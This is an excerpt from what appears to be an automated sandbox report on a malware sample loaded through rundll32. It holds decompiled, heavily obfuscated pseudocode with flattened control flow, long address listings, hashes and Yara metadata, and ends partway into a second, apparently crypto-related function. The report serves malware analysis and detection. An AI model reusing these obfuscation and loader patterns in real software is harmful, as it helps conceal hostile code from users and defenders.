				_t810 = 0x4c;
				_v368 = _v368 * 0x4a;
				_v368 = _v368 ^ 0xfe46f3db;
				_v164 = 0xfa5634;
				_v164 = _v164 << 0xa;
				_v164 = _v164 ^ 0xe95805f5;
				_v172 = 0x9d86eb;
				_v172 = _v172 << 4;
				_v172 = _v172 ^ 0x09d75722;
				_v256 = 0x88ae25;
				_v256 = _v256 + 0xffff9888;
				_v256 = _v256 / _t810;
				_v256 = _v256 ^ 0x0006cec9;
				_v300 = 0x4e3cba;
				_v300 = _v300 ^ 0xaec86311;
				_v300 = _v300 >> 1;
				_v300 = _v300 ^ 0x574be554;
				_v156 = 0xcc8ccd;
				_v156 = _v156 ^ 0x818e95a6;
				_v156 = _v156 ^ 0x8149d9f5;
				_v124 = 0x282d8b;
				_t811 = 0x63;
				_v124 = _v124 / _t811;
				_v124 = _v124 ^ 0x0006a08e;
				_v356 = 0x703a6e;
				_v356 = _v356 << 0xf;
				_t812 = 0x17;
				_v356 = _v356 / _t812;
				_v356 = _v356 * 0x47;
				_v356 = _v356 ^ 0x5a27ab7c;
				_v184 = 0xabb004;
				_v184 = _v184 * 0x62;
				_v184 = _v184 ^ 0x41bb11d7;
				_v412 = 0xb8c7ed;
				_v412 = _v412 * 0x62;
				_v412 = _v412 + 0xffff10d9;
				_v412 = _v412 * 0x19;
				_v412 = _v412 ^ 0xe85860ff;
				_v264 = 0x94e0d2;
				_v264 = _v264 + 0xffffdaee;
				_v264 = _v264 | 0xae8d85da;
				_v264 = _v264 ^ 0xae9ce3c7;
				_v316 = 0xd1b765;
				_v316 = _v316 * 0x77;
				_v316 = _v316 + 0xe12c;
				_v316 = _v316 + 0x9f51;
				_v316 = _v316 ^ 0x617dce52;
				_v144 = 0xce6b76;
				_v144 = _v144 | 0xba09f1aa;
				_v144 = _v144 ^ 0xbac3e068;
				_v404 = 0x63322a;
				_v404 = _v404 ^ 0x9f0f399b;
				_v404 = _v404 * 0x4e;
				_v404 = _v404 * 0x4a;
				_v404 = _v404 ^ 0x78104cb3;
				_v216 = 0xd594b2;
				_v216 = _v216 + 0xf571;
				_v216 = _v216 ^ 0x00d5cf76;
				_v116 = 0xef919a;
				_v116 = _v116 << 0xd;
				_v116 = _v116 ^ 0xf23180e8;
				_v348 = 0xce0390;
				_v348 = _v348 + 0xffffa675;
				_v348 = _v348 + 0xffff84a1;
				_v348 = _v348 ^ 0x00c1e2da;
				_v396 = 0x7df7ff;
				_v396 = _v396 | 0xfdfffbfc;
				_v396 = _v396 ^ 0xfdff4c22;
				_v320 = 0x9ca349;
				_v320 = _v320 + 0xc568;
				_t813 = 7;
				_v320 = _v320 * 0x74;
				_v320 = _v320 * 0x14;
				_v320 = _v320 ^ 0x928c2e40;
				_v232 = 0xd54f23;
				_v232 = _v232 ^ 0xe15f8e30;
				_v232 = _v232 >> 9;
				_v232 = _v232 ^ 0x0079ed07;
				_v328 = 0x9619e2;
				_v328 = _v328 >> 0xf;
				_v328 = _v328 + 0xffff55f8;
				_v328 = _v328 + 0x27fc;
				_v328 = _v328 ^ 0xfffb07bb;
				_v388 = 0xf5c662;
				_v388 = _v388 + 0xffff192d;
				_v388 = _v388 << 6;
				_v388 = _v388 ^ 0x81a7a751;
				_v388 = _v388 ^ 0xbc9807e7;
				_v200 = 0x8d276;
				_v200 = _v200 | 0x4d140240;
				_v200 = _v200 ^ 0x4d1b4a48;
				_v260 = 0x1bde30;
				_v260 = _v260 / _t813;
				_v260 = _v260 ^ 0x62b9a7e6;
				_v260 = _v260 ^ 0x62b42e65;
				_v148 = 0xa934f2;
				_v148 = _v148 | 0xd141041b;
				_v148 = _v148 ^ 0xd1e1ef22;
				_v336 = 0xd722ef;
				_v336 = _v336 ^ 0xf728ea61;
				_v336 = _v336 * 0x41;
				_v336 = _v336 + 0xdc3e;
				_v336 = _v336 ^ 0xf7ff9a03;
				_v344 = 0x7da9d7;
				_v344 = _v344 * 0x5b;
				_v344 = _v344 >> 5;
				_v344 = _v344 ^ 0xb332f6cb;
				_v344 = _v344 ^ 0xb251ceff;
				_v248 = 0xd93304;
				_v248 = _v248 << 5;
				_v248 = _v248 * 0xa;
				_v248 = _v248 ^ 0x0f7c3f5b;
				_v376 = 0xe01f7;
				_v376 = _v376 + 0xffff5834;
				_v376 = _v376 + 0xffff4130;
				_v376 = _v376 ^ 0xd27aacc5;
				_v376 = _v376 ^ 0xd2797cee;
				_v152 = 0x8f3686;
				_v152 = _v152 >> 0xc;
				_v152 = _v152 ^ 0x000cec01;
				_v384 = 0x1fccfd;
				_v384 = _v384 ^ 0xe361d411;
				_v384 = _v384 * 0x14;
				_v384 = _v384 + 0xb1de;
				_v384 = _v384 ^ 0xc5d6ed44;
				_v296 = 0x2c9c5a;
				_v296 = _v296 ^ 0xe8ab125b;
				_v296 = _v296 ^ 0x12f0c7da;
				_v296 = _v296 ^ 0xfa7b923a;
				_v304 = 0x37d359;
				_t903 = 0xcb9b74d;
				_v80 = 0x48;
				_v304 = _v304 * 0x7e;
				_v304 = _v304 | 0xb84966f9;
				_v304 = _v304 * 0x68;
				_v304 = _v304 ^ 0x2a2d9f44;
				_v140 = 0x53fc4;
				_v140 = _v140 ^ 0xe3b2dcd9;
				_v140 = _v140 ^ 0xe3b5fe0e;
				while(1) {
					L1:
					while(1) {
						L2:
						_t814 = 0xb5dc217;
						_t880 = 0xd2f1df;
						do {
							while(1) {
								L3:
								_t915 = _t796 - 0xb1829b2;
								if(_t915 > 0) {
									break;
								}
								if(_t915 == 0) {
									_push(_v372);
									_push(_v308);
									_push(0x3415e8);
									_t775 = E0034AB66(_v364, _v244, __eflags);
									_push(_v176);
									_push(_v112);
									_push(0x341538);
									__eflags = E00350EDA(E0034AB66(_v332, _v168, __eflags), _v120, _v416, _t775,  &_v100, _v252, _v276) - _v160;
									_t796 =  ==  ? 0xd2f1df : 0x4c92ee0;
									E0034AE03(_v400, _v408, _v268, _t775);
									E0034AE03(_v132, _v392, _v236, _t776);
									_t900 = _v84;
									_t908 = _t908 + 0x3c;
									goto L12;
								} else {
									if(_t796 == _t880) {
										_v88 = 0x100;
										_t784 = E00345FE2(_v128, 0x100, _v228,  &_v104, _v284, _v380, _v100);
										_t908 = _t908 + 0x14;
										__eflags = _t784 - _v340;
										_t762 = 0x595c7f7;
										_t796 =  ==  ? 0x595c7f7 : 0x2464b44;
										goto L2;
									} else {
										if(_t796 == 0x2464b44) {
											E00347027(_v304, _v312, _v100, _v140);
										} else {
											if(_t796 == _t762) {
												__eflags = E0035D76F(_v192, _v136, _v104, _v324) - _v108;
												_t796 =  ==  ? _t903 : 0xd356110;
												while(1) {
													L1:
													goto L2;
												}
											} else {
												if(_t796 == 0x60e8fa3) {
													_t796 = 0xb1829b2;
													continue;
												} else {
													if(_t796 == 0x6aa287e) {
														E0035E884(_v388, _v200, _v260, _v92);
														_t796 = 0xbb8b89b;
														while(1) {
															L1:
															L2:
															_t814 = 0xb5dc217;
															_t880 = 0xd2f1df;
															goto L3;
														}
													} else {
														_t921 = _t796 - 0x873eae2;
														if(_t796 == 0x873eae2) {
															_push(_v412);
															_push(_v184);
															_push(0x341588);
															E0035F9E2(_v292, _v264, _v100,  *_t900, _v316, _v124, _v144,  *((intOrPtr*)(_t900 + 4)), _v404, _v216, E0034AB66(_v124, _v356, _t921),  &_v96);
															_t796 =  ==  ? 0xb5dc217 : 0xd356110;
															E0034AE03(_v116, _v348, _v396, _t790);
															_t908 = _t908 + 0x3c;
															L12:
															_t903 = 0xcb9b74d;
															L33:
															_t880 = 0xd2f1df;
															_t814 = 0xb5dc217;
															_t762 = 0x595c7f7;
														}
														goto L34;
													}
												}
											}
										}
									}
								}
								L37:
								return _t907;
							}
							__eflags = _t796 - _t814;
							if(_t796 == _t814) {
								_t761 = E0034F0A0(_v320, _v232, _v96, _v328,  &_v92, _v104, _v240);
								_t908 = _t908 + 0x14;
								__eflags = _t761;
								if(__eflags != 0) {
									_t796 = 0xbb8b89b;
									goto L33;
								} else {
									_t796 = 0xc32131f;
									goto L1;
								}
							} else {
								__eflags = _t796 - 0xbb8b89b;
								if(_t796 == 0xbb8b89b) {
									E00354E64(_v148, _v336, _v96, _v344, _v248);
									_t908 = _t908 + 0xc;
									_t796 = 0xd356110;
									while(1) {
										L1:
										goto L2;
									}
								} else {
									__eflags = _t796 - 0xc32131f;
									if(_t796 == 0xc32131f) {
										_t764 = E0034CFCE(_v92);
										_t796 = 0x6aa287e;
										__eflags = _t764;
										_t907 =  !=  ? 1 : _t907;
										while(1) {
											L1:
											goto L2;
										}
									} else {
										__eflags = _t796 - _t903;
										if(__eflags == 0) {
											_push(_v224);
											_push(_v220);
											_push(0x341588);
											_t906 = E0034AB66(_v212, _v288, __eflags);
											_v88 = _v80;
											_t768 = E00343E2A(_v352, _v180, _t765, _v80, _v360, _v188, _v196, _v204, _v104, _v280,  &_v88, _v80,  &_v76, _v368);
											_t908 = _t908 + 0x3c;
											__eflags = _t768 - _v272;
											if(_t768 != _v272) {
												_t796 = 0xd356110;
											} else {
												_t770 =  *0x365c9c; // 0x0
												E0035FD29( &_v68, _v164, _t770 + 0x10, _v172, 0x40);
												_t908 = _t908 + 0xc;
												_t796 = 0x873eae2;
											}
											E0034AE03(_v256, _v300, _v156, _t906);
											goto L12;
										} else {
											__eflags = _t796 - 0xd356110;
											if(__eflags != 0) {
												goto L34;
											} else {
												E00354E64(_v376, _v152, _v104, _v384, _v296);
												_t908 = _t908 + 0xc;
												_t796 = 0x2464b44;
												while(1) {
													L1:
													goto L2;
												}
											}
										}
									}
								}
							}
							goto L37;
							L34:
						} while (_t796 != 0x4c92ee0);
						goto L37;
					}
				}
			}






















































































































                                                                                                                      0x00349a83
                                                                                                                      0x00349a9c
                                                                                                                      0x00349aa3
                                                                                                                      0x00349aa5
                                                                                                                      0x00349ab0
                                                                                                                      0x00349ab2
                                                                                                                      0x00349abd
                                                                                                                      0x00349ac2
                                                                                                                      0x00349acd
                                                                                                                      0x00349ad8
                                                                                                                      0x00349ae3
                                                                                                                      0x00349aee
                                                                                                                      0x00349af9
                                                                                                                      0x00349b01
                                                                                                                      0x00349b10
                                                                                                                      0x00349b11
                                                                                                                      0x00349b18
                                                                                                                      0x00349b24
                                                                                                                      0x00349b28
                                                                                                                      0x00349b30
                                                                                                                      0x00349b3b
                                                                                                                      0x00349b43
                                                                                                                      0x00349b4a
                                                                                                                      0x00349b55
                                                                                                                      0x00349b60
                                                                                                                      0x00349b6b
                                                                                                                      0x00349b76
                                                                                                                      0x00349b8a
                                                                                                                      0x00349b91
                                                                                                                      0x00349b9c
                                                                                                                      0x00349ba7
                                                                                                                      0x00349bb2
                                                                                                                      0x00349bbd
                                                                                                                      0x00349bc8
                                                                                                                      0x00349bd3
                                                                                                                      0x00349bde
                                                                                                                      0x00349bf1
                                                                                                                      0x00349bf8
                                                                                                                      0x00349c03
                                                                                                                      0x00349c0e
                                                                                                                      0x00349c16
                                                                                                                      0x00349c21
                                                                                                                      0x00349c34
                                                                                                                      0x00349c3b
                                                                                                                      0x00349c46
                                                                                                                      0x00349c51
                                                                                                                      0x00349c59
                                                                                                                      0x00349c61
                                                                                                                      0x00349c66
                                                                                                                      0x00349c6e
                                                                                                                      0x00349c76
                                                                                                                      0x00349c7e
                                                                                                                      0x00349c86
                                                                                                                      0x00349c8e
                                                                                                                      0x00349c93
                                                                                                                      0x00349c9b
                                                                                                                      0x00349ca6
                                                                                                                      0x00349cae
                                                                                                                      0x00349cb9
                                                                                                                      0x00349cc4
                                                                                                                      0x00349ccf
                                                                                                                      0x00349cd6
                                                                                                                      0x00349cde
                                                                                                                      0x00349ce9
                                                                                                                      0x00349cf4
                                                                                                                      0x00349cfc
                                                                                                                      0x00349d01
                                                                                                                      0x00349d0f
                                                                                                                      0x00349d12
                                                                                                                      0x00349d13
                                                                                                                      0x00349d17
                                                                                                                      0x00349d1f
                                                                                                                      0x00349d27
                                                                                                                      0x00349d2c
                                                                                                                      0x00349d34
                                                                                                                      0x00349d39
                                                                                                                      0x00349d41
                                                                                                                      0x00349d4c
                                                                                                                      0x00349d54
                                                                                                                      0x00349d5f
                                                                                                                      0x00349d75
                                                                                                                      0x00349d7c
                                                                                                                      0x00349d87
                                                                                                                      0x00349d92
                                                                                                                      0x00349d9d
                                                                                                                      0x00349da8
                                                                                                                      0x00349db0
                                                                                                                      0x00349dc0
                                                                                                                      0x00349dc6
                                                                                                                      0x00349dce
                                                                                                                      0x00349dd6
                                                                                                                      0x00349de1
                                                                                                                      0x00349df3
                                                                                                                      0x00349df8
                                                                                                                      0x00349e01
                                                                                                                      0x00349e0c
                                                                                                                      0x00349e17
                                                                                                                      0x00349e22
                                                                                                                      0x00349e2d
                                                                                                                      0x00349e38
                                                                                                                      0x00349e40
                                                                                                                      0x00349e45
                                                                                                                      0x00349e4d
                                                                                                                      0x00349e55
                                                                                                                      0x00349e5d
                                                                                                                      0x00349e65
                                                                                                                      0x00349e6d
                                                                                                                      0x00349e76
                                                                                                                      0x00349e7b
                                                                                                                      0x00349e81
                                                                                                                      0x00349e89
                                                                                                                      0x00349e9c
                                                                                                                      0x00349e9d
                                                                                                                      0x00349ea4
                                                                                                                      0x00349eaf
                                                                                                                      0x00349eba
                                                                                                                      0x00349ec5
                                                                                                                      0x00349ed0
                                                                                                                      0x00349edb
                                                                                                                      0x00349ee3
                                                                                                                      0x00349eed
                                                                                                                      0x00349ef7
                                                                                                                      0x00349efb
                                                                                                                      0x00349f03
                                                                                                                      0x00349f19
                                                                                                                      0x00349f1e
                                                                                                                      0x00349f25
                                                                                                                      0x00349f30
                                                                                                                      0x00349f3b
                                                                                                                      0x00349f46
                                                                                                                      0x00349f4e
                                                                                                                      0x00349f59
                                                                                                                      0x00349f64
                                                                                                                      0x00349f6c
                                                                                                                      0x00349f77
                                                                                                                      0x00349f82
                                                                                                                      0x00349f8a
                                                                                                                      0x00349f98
                                                                                                                      0x00349f9d
                                                                                                                      0x00349fa1
                                                                                                                      0x00349fa9
                                                                                                                      0x00349fb1
                                                                                                                      0x00349fbc
                                                                                                                      0x00349fc7
                                                                                                                      0x00349fd2
                                                                                                                      0x00349fe0
                                                                                                                      0x00349fe5
                                                                                                                      0x00349fe9
                                                                                                                      0x00349ff4
                                                                                                                      0x00349ff8
                                                                                                                      0x0034a000
                                                                                                                      0x0034a00b
                                                                                                                      0x0034a013
                                                                                                                      0x0034a01e
                                                                                                                      0x0034a029
                                                                                                                      0x0034a034
                                                                                                                      0x0034a03f
                                                                                                                      0x0034a04a
                                                                                                                      0x0034a055
                                                                                                                      0x0034a060
                                                                                                                      0x0034a06b
                                                                                                                      0x0034a076
                                                                                                                      0x0034a081
                                                                                                                      0x0034a08c
                                                                                                                      0x0034a094
                                                                                                                      0x0034a0a1
                                                                                                                      0x0034a0a5
                                                                                                                      0x0034a0ad
                                                                                                                      0x0034a0b5
                                                                                                                      0x0034a0c0
                                                                                                                      0x0034a0c8
                                                                                                                      0x0034a0d3
                                                                                                                      0x0034a0db
                                                                                                                      0x0034a0e0
                                                                                                                      0x0034a0e5
                                                                                                                      0x0034a0ed
                                                                                                                      0x0034a0f5
                                                                                                                      0x0034a100
                                                                                                                      0x0034a10b
                                                                                                                      0x0034a116
                                                                                                                      0x0034a121
                                                                                                                      0x0034a12c
                                                                                                                      0x0034a137
                                                                                                                      0x0034a142
                                                                                                                      0x0034a14d
                                                                                                                      0x0034a158
                                                                                                                      0x0034a160
                                                                                                                      0x0034a16d
                                                                                                                      0x0034a17a
                                                                                                                      0x0034a17d
                                                                                                                      0x0034a181
                                                                                                                      0x0034a189
                                                                                                                      0x0034a194
                                                                                                                      0x0034a19c
                                                                                                                      0x0034a1a7
                                                                                                                      0x0034a1b2
                                                                                                                      0x0034a1ba
                                                                                                                      0x0034a1c5
                                                                                                                      0x0034a1d0
                                                                                                                      0x0034a1e6
                                                                                                                      0x0034a1ed
                                                                                                                      0x0034a1f8
                                                                                                                      0x0034a203
                                                                                                                      0x0034a20e
                                                                                                                      0x0034a215
                                                                                                                      0x0034a220
                                                                                                                      0x0034a22b
                                                                                                                      0x0034a236
                                                                                                                      0x0034a241
                                                                                                                      0x0034a253
                                                                                                                      0x0034a258
                                                                                                                      0x0034a261
                                                                                                                      0x0034a26c
                                                                                                                      0x0034a274
                                                                                                                      0x0034a27d
                                                                                                                      0x0034a280
                                                                                                                      0x0034a289
                                                                                                                      0x0034a28d
                                                                                                                      0x0034a295
                                                                                                                      0x0034a2a8
                                                                                                                      0x0034a2af
                                                                                                                      0x0034a2ba
                                                                                                                      0x0034a2c7
                                                                                                                      0x0034a2cb
                                                                                                                      0x0034a2d8
                                                                                                                      0x0034a2dc
                                                                                                                      0x0034a2e4
                                                                                                                      0x0034a2ef
                                                                                                                      0x0034a2fa
                                                                                                                      0x0034a305
                                                                                                                      0x0034a310
                                                                                                                      0x0034a31d
                                                                                                                      0x0034a321
                                                                                                                      0x0034a329
                                                                                                                      0x0034a331
                                                                                                                      0x0034a339
                                                                                                                      0x0034a344
                                                                                                                      0x0034a34f
                                                                                                                      0x0034a35a
                                                                                                                      0x0034a362
                                                                                                                      0x0034a36f
                                                                                                                      0x0034a378
                                                                                                                      0x0034a37c
                                                                                                                      0x0034a384
                                                                                                                      0x0034a38f
                                                                                                                      0x0034a39a
                                                                                                                      0x0034a3a5
                                                                                                                      0x0034a3b0
                                                                                                                      0x0034a3b8
                                                                                                                      0x0034a3c3
                                                                                                                      0x0034a3cd
                                                                                                                      0x0034a3d5
                                                                                                                      0x0034a3e5
                                                                                                                      0x0034a3ed
                                                                                                                      0x0034a3f5
                                                                                                                      0x0034a3fd
                                                                                                                      0x0034a405
                                                                                                                      0x0034a40d
                                                                                                                      0x0034a41c
                                                                                                                      0x0034a41d
                                                                                                                      0x0034a426
                                                                                                                      0x0034a42a
                                                                                                                      0x0034a432
                                                                                                                      0x0034a43d
                                                                                                                      0x0034a448
                                                                                                                      0x0034a450
                                                                                                                      0x0034a45b
                                                                                                                      0x0034a463
                                                                                                                      0x0034a468
                                                                                                                      0x0034a470
                                                                                                                      0x0034a478
                                                                                                                      0x0034a480
                                                                                                                      0x0034a488
                                                                                                                      0x0034a490
                                                                                                                      0x0034a495
                                                                                                                      0x0034a49d
                                                                                                                      0x0034a4a5
                                                                                                                      0x0034a4b0
                                                                                                                      0x0034a4bb
                                                                                                                      0x0034a4c6
                                                                                                                      0x0034a4da
                                                                                                                      0x0034a4e1
                                                                                                                      0x0034a4ec
                                                                                                                      0x0034a4f7
                                                                                                                      0x0034a502
                                                                                                                      0x0034a50d
                                                                                                                      0x0034a518
                                                                                                                      0x0034a520
                                                                                                                      0x0034a52d
                                                                                                                      0x0034a531
                                                                                                                      0x0034a539
                                                                                                                      0x0034a541
                                                                                                                      0x0034a54e
                                                                                                                      0x0034a552
                                                                                                                      0x0034a557
                                                                                                                      0x0034a55f
                                                                                                                      0x0034a567
                                                                                                                      0x0034a572
                                                                                                                      0x0034a582
                                                                                                                      0x0034a589
                                                                                                                      0x0034a594
                                                                                                                      0x0034a59c
                                                                                                                      0x0034a5a4
                                                                                                                      0x0034a5ac
                                                                                                                      0x0034a5b4
                                                                                                                      0x0034a5bc
                                                                                                                      0x0034a5c7
                                                                                                                      0x0034a5cf
                                                                                                                      0x0034a5da
                                                                                                                      0x0034a5e2
                                                                                                                      0x0034a5ef
                                                                                                                      0x0034a5f3
                                                                                                                      0x0034a5fb
                                                                                                                      0x0034a603
                                                                                                                      0x0034a60e
                                                                                                                      0x0034a619
                                                                                                                      0x0034a624
                                                                                                                      0x0034a62f
                                                                                                                      0x0034a642
                                                                                                                      0x0034a647
                                                                                                                      0x0034a652
                                                                                                                      0x0034a659
                                                                                                                      0x0034a66c
                                                                                                                      0x0034a673
                                                                                                                      0x0034a67e
                                                                                                                      0x0034a689
                                                                                                                      0x0034a694
                                                                                                                      0x0034a69f
                                                                                                                      0x0034a69f
                                                                                                                      0x0034a6a4
                                                                                                                      0x0034a6a4
                                                                                                                      0x0034a6a4
                                                                                                                      0x0034a6a9
                                                                                                                      0x0034a6ae
                                                                                                                      0x0034a6ae
                                                                                                                      0x0034a6ae
                                                                                                                      0x0034a6ae
                                                                                                                      0x0034a6b4
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034a6ba
                                                                                                                      0x0034a86a
                                                                                                                      0x0034a86e
                                                                                                                      0x0034a880
                                                                                                                      0x0034a885
                                                                                                                      0x0034a88f
                                                                                                                      0x0034a896
                                                                                                                      0x0034a8a8
                                                                                                                      0x0034a8f1
                                                                                                                      0x0034a904
                                                                                                                      0x0034a90b
                                                                                                                      0x0034a923
                                                                                                                      0x0034a928
                                                                                                                      0x0034a92f
                                                                                                                      0x00000000
                                                                                                                      0x0034a6c0
                                                                                                                      0x0034a6c2
                                                                                                                      0x0034a81e
                                                                                                                      0x0034a848
                                                                                                                      0x0034a84f
                                                                                                                      0x0034a85b
                                                                                                                      0x0034a85d
                                                                                                                      0x0034a862
                                                                                                                      0x00000000
                                                                                                                      0x0034a6c8
                                                                                                                      0x0034a6ce
                                                                                                                      0x0034ab52
                                                                                                                      0x0034a6d4
                                                                                                                      0x0034a6d6
                                                                                                                      0x0034a806
                                                                                                                      0x0034a808
                                                                                                                      0x0034a69f
                                                                                                                      0x0034a69f
                                                                                                                      0x00000000
                                                                                                                      0x0034a69f
                                                                                                                      0x0034a6dc
                                                                                                                      0x0034a6e2
                                                                                                                      0x0034a7ce
                                                                                                                      0x00000000
                                                                                                                      0x0034a6e8
                                                                                                                      0x0034a6ee
                                                                                                                      0x0034a7bd
                                                                                                                      0x0034a7c4
                                                                                                                      0x0034a69f
                                                                                                                      0x0034a69f
                                                                                                                      0x0034a6a4
                                                                                                                      0x0034a6a4
                                                                                                                      0x0034a6a9
                                                                                                                      0x00000000
                                                                                                                      0x0034a6a9
                                                                                                                      0x0034a6f4
                                                                                                                      0x0034a6f4
                                                                                                                      0x0034a6fa
                                                                                                                      0x0034a700
                                                                                                                      0x0034a704
                                                                                                                      0x0034a716
                                                                                                                      0x0034a762
                                                                                                                      0x0034a78f
                                                                                                                      0x0034a792
                                                                                                                      0x0034a797
                                                                                                                      0x0034a79a
                                                                                                                      0x0034a79a
                                                                                                                      0x0034ab19
                                                                                                                      0x0034ab19
                                                                                                                      0x0034ab1e
                                                                                                                      0x0034ab23
                                                                                                                      0x0034ab23
                                                                                                                      0x00000000
                                                                                                                      0x0034a6fa
                                                                                                                      0x0034a6ee
                                                                                                                      0x0034a6e2
                                                                                                                      0x0034a6d6
                                                                                                                      0x0034a6ce
                                                                                                                      0x0034a6c2
                                                                                                                      0x0034ab5b
                                                                                                                      0x0034ab65
                                                                                                                      0x0034ab65
                                                                                                                      0x0034a937
                                                                                                                      0x0034a939
                                                                                                                      0x0034aafe
                                                                                                                      0x0034ab03
                                                                                                                      0x0034ab06
                                                                                                                      0x0034ab08
                                                                                                                      0x0034ab14
                                                                                                                      0x00000000
                                                                                                                      0x0034ab0a
                                                                                                                      0x0034ab0a
                                                                                                                      0x00000000
                                                                                                                      0x0034ab0a
                                                                                                                      0x0034a93f
                                                                                                                      0x0034a93f
                                                                                                                      0x0034a945
                                                                                                                      0x0034aabd
                                                                                                                      0x0034aac2
                                                                                                                      0x0034aac5
                                                                                                                      0x0034a69f
                                                                                                                      0x0034a69f
                                                                                                                      0x00000000
                                                                                                                      0x0034a69f
                                                                                                                      0x0034a94b
                                                                                                                      0x0034a94b
                                                                                                                      0x0034a951
                                                                                                                      0x0034aa89
                                                                                                                      0x0034aa90
                                                                                                                      0x0034aa96
                                                                                                                      0x0034aa98
                                                                                                                      0x0034a69f
                                                                                                                      0x0034a69f
                                                                                                                      0x00000000
                                                                                                                      0x0034a69f
                                                                                                                      0x0034a957
                                                                                                                      0x0034a957
                                                                                                                      0x0034a959
                                                                                                                      0x0034a996
                                                                                                                      0x0034a99d
                                                                                                                      0x0034a9b2
                                                                                                                      0x0034a9c6
                                                                                                                      0x0034a9c8
                                                                                                                      0x0034aa1b
                                                                                                                      0x0034aa20
                                                                                                                      0x0034aa23
                                                                                                                      0x0034aa2a
                                                                                                                      0x0034aa5b
                                                                                                                      0x0034aa2c
                                                                                                                      0x0034aa35
                                                                                                                      0x0034aa4c
                                                                                                                      0x0034aa51
                                                                                                                      0x0034aa54
                                                                                                                      0x0034aa54
                                                                                                                      0x0034aa76
                                                                                                                      0x00000000
                                                                                                                      0x0034a95b
                                                                                                                      0x0034a95b
                                                                                                                      0x0034a961
                                                                                                                      0x00000000
                                                                                                                      0x0034a967
                                                                                                                      0x0034a984
                                                                                                                      0x0034a989
                                                                                                                      0x0034a98c
                                                                                                                      0x0034a69f
                                                                                                                      0x0034a69f
                                                                                                                      0x00000000
                                                                                                                      0x0034a69f
                                                                                                                      0x0034a69f
                                                                                                                      0x0034a961
                                                                                                                      0x0034a959
                                                                                                                      0x0034a951
                                                                                                                      0x0034a945
                                                                                                                      0x00000000
                                                                                                                      0x0034ab28
                                                                                                                      0x0034ab28
                                                                                                                      0x00000000
                                                                                                                      0x0034ab34
                                                                                                                      0x0034a6a4

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *2c$,$Api$G=$$H$R\$TKW$a=$n:p$pZy$zR-$4r
                                                                                                                      • API String ID: 0-1047287688
                                                                                                                      • Opcode ID: 189d7d8645dacb8bd60bab753af4c0e6233d9b4f53268da3049caa15939bf484
                                                                                                                      • Instruction ID: 87df9d978a7d8be6aade294af5ce3b33fd560326b92207bf112c520f1e1988e0
                                                                                                                      • Opcode Fuzzy Hash: 189d7d8645dacb8bd60bab753af4c0e6233d9b4f53268da3049caa15939bf484
                                                                                                                      • Instruction Fuzzy Hash: 5E82EF71508381CBD379CF65C58AA8BBBE2FBC4304F10891DE6CA8A260D7B59949CF57
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0035D8D7 Relevance: 15.5, Strings: 12, Instructions: 455COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0035D8D7() {
				char _v520;
				char _v1040;
				char _v1560;
				char _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				unsigned int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				void* _t526;
				signed int _t531;
				void* _t540;
				intOrPtr _t544;
				intOrPtr _t546;
				signed int _t550;
				intOrPtr _t551;
				signed int _t552;
				signed int _t553;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed int _t567;
				void* _t568;
				void* _t625;
				signed int _t627;
				signed int* _t631;

				_t631 =  &_v1760;
				_v1616 = 0xeae527;
				_v1568 = 0;
				_t553 = 0x26;
				_v1616 = _v1616 / _t553;
				_v1616 = _v1616 ^ 0x00062e5a;
				_t625 = 0x971d92c;
				_v1596 = 0x6602e1;
				_t554 = 0x25;
				_v1596 = _v1596 / _t554;
				_v1596 = _v1596 ^ 0x8002c1cf;
				_v1644 = 0xf63434;
				_t555 = 0x47;
				_v1644 = _v1644 / _t555;
				_v1644 = _v1644 + 0xf19c;
				_v1644 = _v1644 ^ 0x00046956;
				_v1716 = 0x50524a;
				_t32 =  &_v1716; // 0x50524a
				_t556 = 0x5f;
				_v1716 =  *_t32 / _t556;
				_v1716 = _v1716 + 0xeb9a;
				_v1716 = _v1716 >> 0x10;
				_v1696 = 0xd12665;
				_v1696 = _v1696 + 0xba99;
				_v1696 = _v1696 >> 2;
				_v1696 = _v1696 ^ 0x003ae3d7;
				_v1572 = 0xb7077f;
				_v1572 = _v1572 >> 0xb;
				_v1572 = _v1572 ^ 0x00005559;
				_v1732 = 0xacadbb;
				_v1732 = _v1732 * 0x18;
				_v1732 = _v1732 + 0xffff3f00;
				_v1732 = _v1732 >> 0xb;
				_v1732 = _v1732 ^ 0x0000fc07;
				_v1628 = 0x1e838c;
				_v1628 = _v1628 + 0xffff51c5;
				_v1628 = _v1628 * 0x68;
				_v1628 = _v1628 ^ 0x0c18a6b3;
				_v1712 = 0x7a729f;
				_v1712 = _v1712 | 0x553aa77e;
